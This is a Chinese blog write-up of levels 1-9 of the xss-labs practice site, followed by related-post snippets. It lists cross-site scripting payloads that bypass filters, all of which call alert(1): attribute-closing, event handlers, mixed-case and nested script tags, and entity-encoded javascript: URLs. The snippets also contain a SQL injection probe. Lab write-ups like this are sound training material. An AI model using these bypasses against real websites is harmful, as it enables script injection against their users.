xsslabs less1-9 wirteup

已于 2022-02-10 16:41:47 修改
阅读量2.9k 收藏 3
点赞数 2
文章标签: web安全 安全 xss
于 2022-02-10 16:40:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46739058/article/details/122861243
版权

目录

第一关

第二关

​ 第三关

第四关

第五关

 第六关

第七关

第8关

第九关

结语

话不多说

直奔主题

第一关

发现url上对name值的修改可以回显在页面,也就是反射型xss,直接写payload就行

第二关

在输入框输入第一关的payload发现能够回显但是不执行,检查网页源代码,发现被闭合了,所以这关去闭合就过了

payload:  "><script>alert(1)</script>"

 第三关

输入第一关payload检查网页源码发现<>被转义了,原因是htmlspecialchar()函数把符号转换为实体化标签,这是xss经常过滤的情况

这时使用其他payload:'οnclick='alert(1)就能通过

第四关

输入代码发现这关把我们的<>这个符号进行了删除

再输入表单的鼠标单击属性来测试“οnclick=”alert(1)发现和第三关是一样的

第五关

通过输入payload发现对script进行了替换,与此同时还对on进行了替换

 这里使用新的payload:"><a href="javascript:alert(1)">"     要注意闭合符号

 第六关

第六关和第五关一样,对一些特殊字符进行了替换

 

 考虑到没有对大小写过滤,因此构造payload:"> <sCRipt>alert(1)</sCRipt>"

第七关

输入payload代码发现script被替换为空,其他字符也一样 

这里想到之前文件上传的检测,考虑可能只对代码进行一次过滤

因此构造payload: "><scrscriptipt>alert(1)</scrscriptipt>"

第8关

输入代码发现也有对特殊字符和符号进行替换

 因为在输入框输入的值会被传到<a href=" ">里面,因此考虑的是<a href="javascript:alert(1)">这种payload,而script关键词又会被替换,因此采用编码构造payload

 

 payload:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#50;&#51;&#41;

第九关

第九关和第八关一样,对特殊字符进行替换,用时还会判断输入的值是否存在“http://”

 结合第八关思路,对javascript:alert(1)进行编码,再后面加上//http://(//这里起到注释作用)

payload:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://

结语

后续的关卡会继续更新

Dues_D
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
less-plugin-clean-css:使用clean-css对CSS进行后期处理和压缩
02-23
npm install -g less-plugin-clean-css 然后在命令行上 lessc file.less --clean-css="--s1 --advanced --compatibility=ie8" 见的可用命令选项-唯一的区别是advanced和rebase ,我们默认为false,因为它并不总是...
less-plugin-autoprefix:添加了由 autoprefixer 对 less 进行后处理的能力
05-29
npm install -g less-plugin-autoprefix 然后在命令行上, lessc file.less --autoprefix="browsers" 浏览器是由逗号分隔的列表。 程序化用法 var LessPluginAutoPrefix = require ( 'less-plugin-autoprefix' )...
Xss-Labs做题笔记:Less-1 - Less-9
Forever_Han13的博客
02-14 283
Leve-1: <script>alert('xss')</script> Leve-2: "><script>alert('xss')</script> // Leve-3: 'οnfοcus=javascript:alert('xss') > // Leve-4: "οnfοcus=javascript:alert('xss') " Leve-5 "><a href=javascript:alert('xss')>xs
sqli-labs 通过教程 Less-3
一期一会的博客
12-03 664
判断字符类型(字符型) $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; 查看源码发现,正常情况是id=$id,在这里我们制造闭合需要构造'),因此闭合时使用') 或者我们输入id=1' 查看报错信息 以下均同理 查找回显点 http://127.0.0.1/sqlilabs/Less-3/?id=1') order by 3--+ http://127.0.0.1/sqlilabs/Less-3/?id=1') order..
XSS-过关小游戏(1-9)
qq_45791294的博客
03-27 241
触发alert()完成关卡。 1. <script>alert()</script> 2. 先测试一下 ctrl + u 查看源代码 观察第17行,闭合第17行即可插入alert "><script>alert()</script> 3. 测试,查看源代码 'onclick = 'alert() onclick:当按钮被点击时执行Javascript代码,这里是为输入框加了onclick,所以访问之后需要点击一
【xss-labs】闯关记录1~9
qq_43665434的博客
03-11 189
【xss-labs】闯关记录1~9 【level2】 输入特殊符号+标识符 查看网页源代码: 发现8989出现了两处,一处是在h2标签中,<>已被html编码,而input标签中的value属性中也有一处输出,且没有编码。 于是构造payload:" ><script>alert(/qianxun/)</script> 成功弹窗! 总结:审计网页源码的时候一定要细心!细心!细心! 【level3】onfocus绕过编码 1、测试流程 如图所示,输出共有
为什么在留言处插入<script>alert(1)</script>不弹框
weixin_30773135的博客
10-01 1396
对于新手来说,往往会在留言地方插入<script>alert(1)</script>来检测是否有存储xss,事实是基本上不会弹框的,为啥? 通过查看源码,可知道<>标签被实体编码了。 是前端和后端设置了过滤?非也!。 因为有些标签自身具备htmlencode功能,标签有: <textarea> <title> <ifra...
less-plugin-lists:更少的ListArray操作
05-13
少插件列表 用于列表/数组操作的插件。...npm install -g less-plugin-lists 与lessc使用 lessc --lists file.less 有关通过命令行Less编译器使用插件的更多详细信息,请参见Less文档中的相应部分。
弹性布局-less--综合案例
11-02
利用弹性布局和less制作网页,利用弹性布局和less制作网页,利用弹性布局和less制作网页,试错前行,越努力越幸运,希望可以和大家一起进步,如有不足,多多包涵!
less-loader:编译不到CSS
04-29
首先,您需要安装less less-loader : $ npm install less less-loader --save-dev 然后将加载程序添加到您的webpack配置中。 例如: webpack.config.js module . exports = { module : { rules : [ { test ...
<script>alert(1)</script>怎么在页面显示且不出现功能
qq_41246943的博客
10-22 2202
该操作可以帮你把入库中的字段进行转义,这样就可以显示出来<script>alert(1)</script> 这里只是简单的对XSS注入测试进行操作 另外如果不想在数据库中存储这样的值可以在显示查询的时候进行操作 ...
XSS之xss-labs-level9
Hugu
02-23 616
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的
XSS学习笔记:XSS Challenges 1-19通关全详解
闵行小鱼塘
10-07 5878
通过 XSS Challenges 平台学习下XSS,共19关
xss漏洞1-9关
G208_522的博客
11-20 3109
第一关 没有可以输入的表单,直接在url中拼接 <script>alert('xss')</script> 源码展示 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> window.alert = function()
XSS挑战之旅(1-9)
老司机开代码的博客
08-27 1279
文章目录环境搭建第一关第二关第三关第四关第五关第六关第七关第八关第九关 环境搭建 XSSlab的搭建很简单,下载好压缩包,解压到phpstudy的WWW目录下即可访问。 源码下载(t8t7) 如果不想自己搭建的话,网上有很多搭建好的可以直接测试,比如: https://xss.angelo.org.cn 前几关还是比较水的,直接把做题过程记录下来好了。。。 第一关 如图所示,第一关展示的是我们可以通过url中的?name参数,向网站提交数据,然后返回到页面上。 那么直接试一下把name的值提交成弹框。
2024中国网络安全产品用户调查报告(发布版)
最新发布
2301_76786857的博客
06-12 865
本报告正是安在新媒体发起,基于“诸子云社群,以“取之于民,用之于民"的方式,反馈“甲方"眼中的中国网络安全市场情况,为网络安全行业提供来自网络安全企业用户视角的参考。自2020年始,人类进入了21世纪的第二个十年,全球进入了百年未有之大变局,新十年的开始即被新冠疫情逆转了全球化发展的历程,而至2022年3月俄乌战争又突然爆发,紧接着2023年7月“巴以冲突"皱起,世界快速进入动荡中,不确定性激增,网络对抗愈演愈烈,导致中国网络安全市场和环境受到重大影响。
网络安全管理组织架构复习
LongL_GuYu的博客
06-12 497
网络安全管理组织架构复习
less less-loader
02-06
less 是一种 CSS 预处理器,它允许使用变量、函数、嵌套等高级功能来编写 CSS 代码。less-loader 是 Webpack 的一个模块加载器,用于在 Webpack 中使用 less。它可以将 less 文件转换为 CSS 代码并加载到页面中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dues_D

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值